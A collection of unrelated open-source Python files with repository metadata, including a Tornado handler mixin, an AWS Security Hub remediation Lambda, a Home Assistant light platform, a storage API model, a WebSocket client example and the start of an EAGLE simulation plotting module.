guanzhenxing/loquat
|
cdfe7464ed48bde448355ad6bc830e5d94760b6e
|
[
"MIT"
] | null | null | null |
loquat/handler.py
|
guanzhenxing/loquat
|
cdfe7464ed48bde448355ad6bc830e5d94760b6e
|
[
"MIT"
] | null | null | null |
loquat/handler.py
|
guanzhenxing/loquat
|
cdfe7464ed48bde448355ad6bc830e5d94760b6e
|
[
"MIT"
] | null | null | null |
import logging
from typing import Optional, Awaitable, Any, Union
import tornado.web
from tornado import httputil
from .middleware import MiddlewareType
logger = logging.getLogger(__name__)
class MiddlewareHandlerMixin(object):
def __init__(self, application, request, **kwargs: Any) -> None:
super().__init__(application, request, **kwargs)
self.middleware_manager = self.application.middleware_manager
def prepare(self) -> Optional[Awaitable[None]]:
"""
在每个请求的最开始的时候被调用, 在 get/post/等方法之前.
"""
super().prepare()
return self._process_middlewares(mw_type=MiddlewareType.BEFORE_REQUEST)
def on_finish(self) -> None:
"""在一个请求结束后被调用."""
super().on_finish()
self._process_middlewares(mw_type=MiddlewareType.HANDLE_FINISHED)
def finish(self, chunk: Union[str, bytes, dict] = None) -> "Future[None]":
"""完成响应后调用."""
# finish之前可能执行过多次write,反而chunk可能为None
# 真正的chunk数据在self._write_buffer中,包含历次write的数据
# 这里将chunk数据write进_write_buffer中,然后将chunk置空
if chunk:
self.write(chunk)
chunk = None
self._process_middlewares(MiddlewareType.AFTER_RESPONSE, chunk)
return super().finish(chunk)
def _process_middlewares(self, mw_type, *args, **kwargs):
"""根据中间件类型执行中间件"""
self.middleware_manager.run_middleware_type(mw_type, self, *args, **kwargs)
class _PatchHandler(tornado.web.RequestHandler):
def __init__(self, application, request, **kwargs) -> None:
super().__init__(application, request, **kwargs)
def data_received(self, chunk: bytes) -> Optional[Awaitable[None]]:
pass
class BaseHandler(_PatchHandler):
"""A class to collect common handler methods - all other handlers should subclass this one.
"""
def __init__(self, application: "Application", request: httputil.HTTPServerRequest, **kwargs: Any) -> None:
super().__init__(application, request, **kwargs)
class RestfulHandler(BaseHandler):
def __init__(self, application, request, **kwargs: Any) -> None:
super().__init__(application, request, **kwargs)
| 32.757576
| 111
| 0.685939
|
4a18bad7bb2393ea6346c8f27c2cc82d14d0472c
| 8,991
|
py
|
Python
|
source/playbooks/CIS/lambda/cis26.py
|
fuellbie/aws-security-hub-automated-response-and-remediation
|
3de36c0d1d1d84fb175dad88343bd54d819e5c78
|
[
"Apache-2.0"
] | null | null | null |
source/playbooks/CIS/lambda/cis26.py
|
fuellbie/aws-security-hub-automated-response-and-remediation
|
3de36c0d1d1d84fb175dad88343bd54d819e5c78
|
[
"Apache-2.0"
] | null | null | null |
source/playbooks/CIS/lambda/cis26.py
|
fuellbie/aws-security-hub-automated-response-and-remediation
|
3de36c0d1d1d84fb175dad88343bd54d819e5c78
|
[
"Apache-2.0"
] | 2
|
2021-11-08T04:05:48.000Z
|
2021-11-08T04:55:53.000Z
|
#!/usr/bin/python
###############################################################################
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License Version 2.0 (the "License"). You may not #
# use this file except in compliance with the License. A copy of the License #
# is located at #
# #
# http://www.apache.org/licenses/ #
# #
# or in the "license" file accompanying this file. This file is distributed #
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express #
# or implied. See the License for the specific language governing permis- #
# sions and limitations under the License. #
###############################################################################
import os
import hashlib
from botocore.config import Config
import botocore
from lib.sechub_findings import Finding, notify
from lib.logger import Logger
from lib.awsapi_helpers import AWSClient, BotoSession
from lib.applogger import LogHandler
from lib.metrics import Metrics
from lib.aws_utils import resource_from_arn
#------------------------------
# Remediation-Specific
#------------------------------
LAMBDA_ROLE = 'SO0111_CIS26_memberRole'
REMEDIATION = 'Enable Access Logging on CloudTrail logs bucket'
AFFECTED_OBJECT = 'CloudTrail'
LOGGING_BUCKET_PREFIX = 'so0111-sharr-cloudtrailaccessLogs'
#------------------------------
PLAYBOOK = os.path.basename(__file__[:-3])
# initialise LOGGERs
LOG_LEVEL = os.getenv('log_level', 'info')
LOGGER = Logger(loglevel=LOG_LEVEL)
APPLOGGER = LogHandler(PLAYBOOK) # application LOGGER for CW Logs
# Get AWS region from Lambda environment. If not present then we're not
# running under lambda, so defaulting to us-east-1
AWS_REGION = os.getenv('AWS_DEFAULT_REGION', 'us-east-1')
AWS_PARTITION = os.getenv('AWS_PARTITION', 'aws')
# Append region name to LAMBDA_ROLE
LAMBDA_ROLE += '_' + AWS_REGION
BOTO_CONFIG = Config(
retries={
'max_attempts': 10
},
region_name=AWS_REGION
)
AWS = AWSClient(AWS_PARTITION, AWS_REGION)
#------------------------------------------------------------------------------
# HANDLER
#------------------------------------------------------------------------------
def lambda_handler(event, context):
LOGGER.debug(event)
metrics = Metrics(event)
try:
for finding_rec in event['detail']['findings']:
finding = Finding(finding_rec)
LOGGER.info('FINDING_ID: ' + str(finding.details.get('Id')))
remediate(finding, metrics.get_metrics_from_finding(finding_rec))
except Exception as e:
LOGGER.error(e)
APPLOGGER.flush() # flush the buffer to CW Logs
#------------------------------------------------------------------------------
# REMEDIATION
#------------------------------------------------------------------------------
def remediate(finding, metrics_data):
message = {
'Note': '',
'State': 'INFO',
'Account': finding.account_id,
'Remediation': REMEDIATION,
'metrics_data': metrics_data
}
def failed():
"""
Send Failed status message
"""
message['State'] = 'FAILED'
message['Note'] = ''
notify(finding, message, LOGGER, cwlogs=APPLOGGER)
# Make sure it matches - custom action can be initiated for any finding.
# Ignore if the finding selected and the playbook do not match
cis_data = finding.is_cis_ruleset()
if not cis_data:
# Not an applicable finding - does not match ruleset
# send an error and exit
LOGGER.debug('CIS 2.6: incorrect custom action selection.')
APPLOGGER.add_message('CIS 2.6: incorrect custom action selection.')
return
if (cis_data['ruleid'] not in ['2.6']):
# Not an applicable finding - does not match rule
# send an error and exit
LOGGER.debug('CIS 2.6: incorrect custom action selection.')
APPLOGGER.add_message('CIS 2.6: incorrect custom action selection.')
return
resource_type = str(finding.details['Resources'][0]["Type"])
if resource_type == 'AwsAccount':
# This code snippet is invoked when the user selects a finding with type as AwsAccount
# this finding in security hub is more referring to the account in general and doesn't provide
# information of the specific remediation, once the specific Resource Type errors are resolved
# this finding will be resolved as well, therefore there is no specific remediation for this finding.
LOGGER.debug('for finding type AwsAccount, there is no resolution.')
APPLOGGER.add_message('AwsAccount is a general finding for the entire account. Once the specific findings are resolved for resource type(s) other than AwsAccount, \
this will be marked as resolved.')
message['State'] = 'INITIAL'
message['Note'] = 'The finding is related to the AWS account.'
notify(finding, message, LOGGER, cwlogs=APPLOGGER)
return
#==========================================================================
# Parse ARN of non-compliant resource from Security Hub CWE
try:
ctBucket = str(finding.details['Resources'][0]['Id'])
# Remove ARN string, create new variable
formattedCTBucket = resource_from_arn(ctBucket)
except Exception as e:
message['Note'] = str(e) + ' - Finding format is not as expected.'
message['State'] = 'FAILED'
notify(finding, message, LOGGER, cwlogs=APPLOGGER)
return
message['AffectedObject'] = AFFECTED_OBJECT + ': ' + formattedCTBucket
try:
sess = BotoSession(finding.account_id, LAMBDA_ROLE)
ssm = sess.client('ssm')
s3 = sess.client('s3')
except Exception as e:
LOGGER.error(e)
failed()
return
# Mark the finding NOTIFIED while we remediate
message['State'] = 'INITIAL'
notify(finding, message, LOGGER, cwlogs=APPLOGGER)
# Create a bucket for the access logs
# The same bucket is used to log access for all CloudTrails in the same account
accessLoggingBucket = LOGGING_BUCKET_PREFIX + "-" + finding.account_id + "-" + AWS_REGION
accessLoggingBucket = accessLoggingBucket.lower()
try:
kwargs = {
'Bucket': accessLoggingBucket,
'GrantWrite': 'uri=http://acs.amazonaws.com/groups/s3/LogDelivery',
'GrantReadACP': 'uri=http://acs.amazonaws.com/groups/s3/LogDelivery'
}
if AWS_REGION != 'us-east-1':
kwargs['CreateBucketConfiguration'] = {
'LocationConstraint': AWS_REGION
}
s3.create_bucket(**kwargs)
s3.put_bucket_encryption(
Bucket=accessLoggingBucket,
ServerSideEncryptionConfiguration={
'Rules': [
{
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256'
}
}
]
}
)
except botocore.exceptions.ClientError as error:
if error.response['Error']['Code'] == 'BucketAlreadyExists':
pass
elif error.response['Error']['Code'] == 'BucketAlreadyOwnedByYou':
pass
else:
LOGGER.error(error)
failed()
return
except Exception as e:
LOGGER.error(e)
failed()
return
# execute automation with ConfigureS3BucketLogging Document
try:
response = ssm.start_automation_execution(
DocumentName='AWS-ConfigureS3BucketLogging',
DocumentVersion='1',
Parameters={
'BucketName': [formattedCTBucket],
'GrantedPermission': ['READ'],
'GranteeType': ['Group'],
'GranteeUri': ['http://acs.amazonaws.com/groups/s3/LogDelivery'], ## Must Use URI, fails with Canonical Group Id
'TargetPrefix' : [formattedCTBucket + '/'],
'TargetBucket': [accessLoggingBucket],
'AutomationAssumeRole': ['arn:' + AWS_PARTITION + ':iam::' + \
finding.account_id + ':role/' + LAMBDA_ROLE]
}
)
LOGGER.debug(response)
message['Note'] = '\"' + REMEDIATION + '\" remediation was successfully invoked via AWS Systems Manager'
message['State'] = 'RESOLVED'
notify(finding, message, LOGGER, cwlogs=APPLOGGER, sns=AWS)
except Exception as e:
LOGGER.error(e)
failed()
return
| 39.96
| 172
| 0.566567
|
4a18bc05092f09f2b9cb9db4b9460e022c8c8674
| 1,517
|
py
|
Python
|
main.py
|
nickyjaspers/textracematrix
|
a36b3cf297e5b30684309663270643846caf86f2
|
[
"MIT"
] | null | null | null |
main.py
|
nickyjaspers/textracematrix
|
a36b3cf297e5b30684309663270643846caf86f2
|
[
"MIT"
] | null | null | null |
main.py
|
nickyjaspers/textracematrix
|
a36b3cf297e5b30684309663270643846caf86f2
|
[
"MIT"
] | null | null | null |
import getopt
import sys
import os
from code_parser import CodeParser
from file_browser import FileBrowser
from matrix_writer import MatrixWriter
def usage():
print("===============================================")
print("Get requirements trace matrix mapping for files")
print("")
print("-d [BASEDIR] (default = '.')")
print("-e [FILE EXTENSION] (default = '*.java')")
print("")
print("A mapping is recognized when following pattern is found in a file:")
print("// REQ: req1, req2")
print("@Test")
print("public void TestMethod()")
print("")
print("===============================================")
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "hd:e:", ["help", "basedir", "extension"])
except getopt.GetoptError as err:
print(str(err))
usage()
sys.exit(2)
extension = '*.java'
base_dir = os.path.dirname(os.path.abspath(__file__))
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-d", "--basedir"):
base_dir = a
elif o in ("-e", "--extension"):
extension = a
else:
assert False, "unhandled option"
files = FileBrowser.get_files(basedir=base_dir, extension=extension)
parser = CodeParser()
for f in files:
parser.get_requirements_and_test_cases(f)
writer = MatrixWriter(parser.req_test_mapping)
writer.write()
if __name__ == "__main__":
main()
| 27.581818
| 91
| 0.556361
|
4a18bc996724f97e2a43cc5d3c46c399997f07c2
| 3,345
|
py
|
Python
|
homeassistant/components/light/scsgate.py
|
dauden1184/home-assistant
|
f4c6d389b77d0efa86644e76604eaea5d21abdb5
|
[
"Apache-2.0"
] | 4
|
2019-01-10T14:47:54.000Z
|
2021-04-22T02:06:27.000Z
|
homeassistant/components/light/scsgate.py
|
dauden1184/home-assistant
|
f4c6d389b77d0efa86644e76604eaea5d21abdb5
|
[
"Apache-2.0"
] | 6
|
2021-02-08T20:25:50.000Z
|
2022-03-11T23:27:53.000Z
|
homeassistant/components/light/scsgate.py
|
dauden1184/home-assistant
|
f4c6d389b77d0efa86644e76604eaea5d21abdb5
|
[
"Apache-2.0"
] | 3
|
2018-08-29T19:26:20.000Z
|
2020-01-19T11:58:22.000Z
|
"""
Support for SCSGate lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.scsgate/
"""
import logging
import voluptuous as vol
from homeassistant.components import scsgate
from homeassistant.components.light import (Light, PLATFORM_SCHEMA)
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_STATE, CONF_DEVICES, CONF_NAME)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['scsgate']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_DEVICES): vol.Schema({cv.slug: scsgate.SCSGATE_SCHEMA}),
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the SCSGate switches."""
devices = config.get(CONF_DEVICES)
lights = []
logger = logging.getLogger(__name__)
if devices:
for _, entity_info in devices.items():
if entity_info[scsgate.CONF_SCS_ID] in scsgate.SCSGATE.devices:
continue
name = entity_info[CONF_NAME]
scs_id = entity_info[scsgate.CONF_SCS_ID]
logger.info("Adding %s scsgate.light", name)
light = SCSGateLight(name=name, scs_id=scs_id, logger=logger)
lights.append(light)
add_entities(lights)
scsgate.SCSGATE.add_devices_to_register(lights)
class SCSGateLight(Light):
"""Representation of a SCSGate light."""
def __init__(self, scs_id, name, logger):
"""Initialize the light."""
self._name = name
self._scs_id = scs_id
self._toggled = False
self._logger = logger
@property
def scs_id(self):
"""Return the SCS ID."""
return self._scs_id
@property
def should_poll(self):
"""No polling needed for a SCSGate light."""
return False
@property
def name(self):
"""Return the name of the device if any."""
return self._name
@property
def is_on(self):
"""Return true if light is on."""
return self._toggled
def turn_on(self, **kwargs):
"""Turn the device on."""
from scsgate.tasks import ToggleStatusTask
scsgate.SCSGATE.append_task(
ToggleStatusTask(target=self._scs_id, toggled=True))
self._toggled = True
self.schedule_update_ha_state()
def turn_off(self, **kwargs):
"""Turn the device off."""
from scsgate.tasks import ToggleStatusTask
scsgate.SCSGATE.append_task(
ToggleStatusTask(target=self._scs_id, toggled=False))
self._toggled = False
self.schedule_update_ha_state()
def process_event(self, message):
"""Handle a SCSGate message related with this light."""
if self._toggled == message.toggled:
self._logger.info(
"Light %s, ignoring message %s because state already active",
self._scs_id, message)
# Nothing changed, ignoring
return
self._toggled = message.toggled
self.schedule_update_ha_state()
command = "off"
if self._toggled:
command = "on"
self.hass.bus.fire(
'button_pressed', {
ATTR_ENTITY_ID: self._scs_id,
ATTR_STATE: command,
}
)
| 27.644628
| 78
| 0.63707
|
4a18bd455bc4406e6bd79e045fa787a88f66438b
| 1,593
|
py
|
Python
|
test/unit/test_all_unit.py
|
muchu1983/104_cameo
|
8c7f78de198a5bd8d870589402e3b7e8b59f520a
|
[
"BSD-3-Clause"
] | 1
|
2017-05-25T20:25:20.000Z
|
2017-05-25T20:25:20.000Z
|
test/unit/test_all_unit.py
|
muchu1983/104_findfine
|
b2255db6327324e89b914fd93a81f7ea5eac6f64
|
[
"BSD-3-Clause"
] | null | null | null |
test/unit/test_all_unit.py
|
muchu1983/104_findfine
|
b2255db6327324e89b914fd93a81f7ea5eac6f64
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2015, MuChu Hsu
Contributed by Muchu Hsu (muchu1983@gmail.com)
This file is part of BSD license
<https://opensource.org/licenses/BSD-3-Clause>
"""
import unittest
from test.unit.test_player import PlayerTest
from test.unit.test_world import WorldTest
from test.unit.test_serverthread import ServerThreadTest
from test.unit.test_jsonrequesthandler import JsonRequestHandlerTest
from test.unit.test_message import MessageTest
from test.unit.test_client import ClientTest
from test.unit.test_lockedcase import LockedCaseTest
"""
執行所有單元測試
"""
suite_of_all_unit = unittest.TestSuite()
#讀取 TestCase
suite_of_player = unittest.TestLoader().loadTestsFromTestCase(PlayerTest)
suite_of_world = unittest.TestLoader().loadTestsFromTestCase(WorldTest)
suite_of_serverthread = unittest.TestLoader().loadTestsFromTestCase(ServerThreadTest)
suite_of_jsonrequesthandler = unittest.TestLoader().loadTestsFromTestCase(JsonRequestHandlerTest)
suite_of_message = unittest.TestLoader().loadTestsFromTestCase(MessageTest)
suite_of_client = unittest.TestLoader().loadTestsFromTestCase(ClientTest)
suite_of_lockedcase = unittest.TestLoader().loadTestsFromTestCase(LockedCaseTest)
#加入 TestCase
suite_of_all_unit.addTest(suite_of_player)
suite_of_all_unit.addTest(suite_of_world)
suite_of_all_unit.addTest(suite_of_serverthread)
suite_of_all_unit.addTest(suite_of_jsonrequesthandler)
suite_of_all_unit.addTest(suite_of_message)
suite_of_all_unit.addTest(suite_of_client)
suite_of_all_unit.addTest(suite_of_lockedcase)
#執行測試
unittest.TextTestRunner().run(suite_of_all_unit)
| 37.046512
| 97
| 0.85248
|
4a18bd4dbb2051653a62ab3c9f8414006b3b2666
| 5,492
|
py
|
Python
|
pypureclient/flasharray/FA_2_13/models/resource_performance_no_id_by_array_get_response.py
|
ashahid-ps/py-pure-client
|
2e3565d37b2a41db69308769f6f485d08a7c46c3
|
[
"BSD-2-Clause"
] | null | null | null |
pypureclient/flasharray/FA_2_13/models/resource_performance_no_id_by_array_get_response.py
|
ashahid-ps/py-pure-client
|
2e3565d37b2a41db69308769f6f485d08a7c46c3
|
[
"BSD-2-Clause"
] | null | null | null |
pypureclient/flasharray/FA_2_13/models/resource_performance_no_id_by_array_get_response.py
|
ashahid-ps/py-pure-client
|
2e3565d37b2a41db69308769f6f485d08a7c46c3
|
[
"BSD-2-Clause"
] | null | null | null |
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.13
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_13 import models
class ResourcePerformanceNoIdByArrayGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'more_items_remaining': 'bool',
'total_item_count': 'int',
'continuation_token': 'str',
'items': 'list[ResourcePerformanceNoIdByArray]',
'total': 'list[ResourcePerformanceNoIdByArray]'
}
attribute_map = {
'more_items_remaining': 'more_items_remaining',
'total_item_count': 'total_item_count',
'continuation_token': 'continuation_token',
'items': 'items',
'total': 'total'
}
required_args = {
}
def __init__(
self,
more_items_remaining=None, # type: bool
total_item_count=None, # type: int
continuation_token=None, # type: str
items=None, # type: List[models.ResourcePerformanceNoIdByArray]
total=None, # type: List[models.ResourcePerformanceNoIdByArray]
):
"""
Keyword args:
more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
items (list[ResourcePerformanceNoIdByArray]): Performance data, broken down by array. If `total_only=true`, the `items` list will be empty.
total (list[ResourcePerformanceNoIdByArray]): The aggregate value of all items after filtering. Where it makes more sense, the average value is displayed instead. The values are displayed for each field where meaningful.
"""
if more_items_remaining is not None:
self.more_items_remaining = more_items_remaining
if total_item_count is not None:
self.total_item_count = total_item_count
if continuation_token is not None:
self.continuation_token = continuation_token
if items is not None:
self.items = items
if total is not None:
self.total = total
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ResourcePerformanceNoIdByArrayGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ResourcePerformanceNoIdByArrayGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResourcePerformanceNoIdByArrayGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 40.382353
| 524
| 0.627276
|
4a18be0601e7be47831fea7f7f54edcda2966a26
| 1,812
|
py
|
Python
|
examples/twisted/websocket/pingpong_keepalive/client.py
|
rapyuta-robotics/autobahn-python
|
c08e9e352d526a7fd0885bb94706366a432ada1a
|
[
"MIT"
] | 1,670
|
2015-10-12T15:46:22.000Z
|
2022-03-30T22:12:53.000Z
|
examples/twisted/websocket/pingpong_keepalive/client.py
|
rapyuta-robotics/autobahn-python
|
c08e9e352d526a7fd0885bb94706366a432ada1a
|
[
"MIT"
] | 852
|
2015-10-16T22:11:03.000Z
|
2022-03-27T07:57:01.000Z
|
examples/twisted/websocket/pingpong_keepalive/client.py
|
rapyuta-robotics/autobahn-python
|
c08e9e352d526a7fd0885bb94706366a432ada1a
|
[
"MIT"
] | 790
|
2015-10-15T08:46:12.000Z
|
2022-03-30T12:22:13.000Z
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import sys
from twisted.internet import reactor
from twisted.python import log
from autobahn.twisted.websocket import WebSocketClientFactory, \
WebSocketClientProtocol, \
connectWS
if __name__ == '__main__':
log.startLogging(sys.stdout)
if len(sys.argv) < 2:
print("Need the WebSocket server address, i.e. ws://127.0.0.1:9000")
sys.exit(1)
factory = WebSocketClientFactory(sys.argv[1])
factory.protocol = WebSocketClientProtocol
connectWS(factory)
reactor.run()
| 36.24
| 79
| 0.687086
|
4a18be1c7dce934788c634dafdfa5a84b02f092e
| 1,638
|
py
|
Python
|
run.py
|
Spico197/open-entity-relation-extraction
|
0f2f805dadfa175581a4f5b8504677986d7fa8c0
|
[
"MIT"
] | 1
|
2021-05-28T15:07:11.000Z
|
2021-05-28T15:07:11.000Z
|
run.py
|
Spico197/open-entity-relation-extraction
|
0f2f805dadfa175581a4f5b8504677986d7fa8c0
|
[
"MIT"
] | null | null | null |
run.py
|
Spico197/open-entity-relation-extraction
|
0f2f805dadfa175581a4f5b8504677986d7fa8c0
|
[
"MIT"
] | null | null | null |
import os
import re
from oer.core.nlp import NLP
from oer.core.extractor import Extractor
from oer.core.pipeline import Pipeline
def predict_file(input_path, output_path):
if os.path.isfile(output_path):
os.remove(output_path)
print('Start extracting...')
# 实例化NLP(分词,词性标注,命名实体识别,依存句法分析)
nlp = NLP()
num = 1 # 知识三元组
with open(input_path, 'r', encoding='utf-8') as f_in:
# 分句,获得句子列表
origin_sentences = re.split('[。?!;]|\n', f_in.read())
# 遍历每一篇文档中的句子
for origin_sentence in origin_sentences:
# 原始句子长度小于6,跳过
if (len(origin_sentence) < 6):
continue
print('*****')
# print(origin_sentence)
# 分词处理
lemmas, hidden = nlp.segment(origin_sentence)
# 词性标注
words_postag = nlp.postag(lemmas, hidden)
# sentence = nlp.parse(words_postag, hidden)
# 命名实体识别
words_netag = nlp.netag(words_postag, hidden)
# 依存句法分析
sentence = nlp.parse_seged(words_netag)
print(sentence.to_string())
Extractor.extract(origin_sentence, sentence, file_path=output_path, verbose=True)
if __name__ == '__main__':
# input_path = 'data/input_text.txt' # 输入的文本文件
# output_path = 'data/knowledge_triple.json' # 输出的处理结果Json文件
# predict_file(input_path, output_path)
pipeline = Pipeline()
results = pipeline.predict("高克访问中国,并在同济大学发表演讲。", more_common=False, verbose=False)
print(results)
results = pipeline.predict("奥巴马毕业于哈佛大学。", more_common=False, verbose=False)
print(results)
| 30.90566
| 93
| 0.622711
|
4a18be242ac986b70247a4267debd20458fffb8d
| 21,403
|
py
|
Python
|
CAAPR/CAAPR_AstroMagic/PTS/pts/eagle/plotresults.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 7
|
2016-05-20T21:56:39.000Z
|
2022-02-07T21:09:48.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/eagle/plotresults.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2019-03-21T16:10:04.000Z
|
2019-03-22T17:21:56.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/eagle/plotresults.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2020-05-19T16:17:17.000Z
|
2020-05-19T16:17:17.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.eagle.plotresults Plot histograms and scaling relations for a collection of EAGLE SKIRT-runs.
#
# The facilities in this module serve to plot histograms and scaling relations for the results in a set of EAGLE
# SKIRT-runs that have been previously collected in a single data file.
# -----------------------------------------------------------------
import os.path
import numpy as np
import matplotlib.pyplot as plt
from .collections import CollectionData, log_if_positive, divide_if_positive, log_divide_if_positive
from ..core.simulation.units import SkirtUnits
from ..core.basics.filter import Filter
from . import config
# -----------------------------------------------------------------
# some globals used in the axis type definitions
units = SkirtUnits('stellar','frequency') # distance in pc, flux density in Jy
pc = units.convert(1., from_unit='pc', to_unit='m')
Msun = units.convert(1., from_unit='Msun', to_unit='kg')
Lsun = units.convert(1., from_unit='Lsun', to_unit='W')
LsunK = 10**((34.1-5.19)/2.5) # solar luminosity in K band expressed in W/Hz (AB magnitude is 5.19)
LsunH = 10**((34.1-4.71)/2.5) # solar luminosity in H band expressed in W/Hz (AB magnitude is 4.71)
c = 2.99792458e8 # speed of light in m/s
# global to hold instance of CollectionData, assigned in plotresults() and used in axis type definitions
cd = None
# -----------------------------------------------------------------
## This dictionary contains plot axis type definitions for use in combination with EAGLE SKIRT-run result collections.
# The dictionary keys function as axis type identifiers. Each value specifies a plot axis as a tuple containing
# a human-readable label and a callable that returns the axis value for a given SKIRT-run result. The callable is
# executed in a context that has a global variable "cd" holding the relevant CollectionData instance.
# If an instrument is specified on a higher level in the plotting function, the instrument name is stripped from the
# property names in the CollectionData instance.
axistypes = {
# dust grid properties
'Ngasparts': ( r"$N_{\mathrm{particles},\mathrm{gas}}/10^3$", lambda: cd.setup_particles_cold_gas/1e3 ),
'Ncells': ( r"$N_\mathrm{cells}/10^6$", lambda: cd.setup_cells_dust_grid/1e6 ),
'taumax': ( r"$\tau_\mathrm{V,max}$", lambda: cd.setup_optical_depth_maximum ),
'tau90': ( r"$\tau_\mathrm{V,90}$", lambda: cd.setup_optical_depth_percentile90 ),
'dusterror': ( r"$\mathrm{|1-(M_\mathrm{grid}/M_\mathrm{dust})|\,[\%]}$",
lambda: 100*divide_if_positive(np.abs(cd.setup_mass_dust-cd.setup_mass_dust_grid),cd.setup_mass_dust) ),
# intrinsic properties
'logMstar': ( r"$\log_{10}(M_*)\,[M_\odot]$", lambda: log_if_positive(cd.original_mass_stars) ),
'logMdust': ( r"$\log_{10}(M_\mathrm{dust})\,[M_\odot]$", lambda: log_if_positive(cd.exported_mass_dust) ),
'logMdust/Mstar': ( r"$\log_{10}(M_\mathrm{dust}/M_*)$", lambda: log_divide_if_positive(cd.exported_mass_dust,cd.original_mass_stars) ),
'logMhii': ( r"$\log_{10}(M_\mathrm{HII})\,[M_\odot]$", lambda: log_if_positive(cd.exported_mass_hii_regions) ),
'fracMhii.fromgas': ( r"$M_{\mathrm{HII},\mathrm{from gas}}/M_{\mathrm{HII},\mathrm{total}}$",
lambda: divide_if_positive(cd.exported_mass_hii_regions_from_gas,cd.exported_mass_hii_regions) ),
'logLtot': ( r"$\log_{10}(L_\mathrm{tot})\,[L_\odot]$", lambda: log_if_positive(cd.setup_luminosity_stars+cd.setup_luminosity_hii_regions) ),
'logLhii': ( r"$\log_{10}(L_\mathrm{HII})\,[L_\odot]$", lambda: log_if_positive(cd.setup_luminosity_hii_regions) ),
'Zgas': ( r"$Z_\mathrm{gas}$", lambda: divide_if_positive(cd.exported_mass_metallic_gas-cd.exported_mass_negative_metallic_gas,
cd.exported_mass_cold_gas-cd.exported_mass_negative_cold_gas) ),
'fdust': ( r"$f_\mathrm{dust}$", lambda: divide_if_positive(cd.exported_mass_dust,cd.exported_mass_metallic_gas) ),
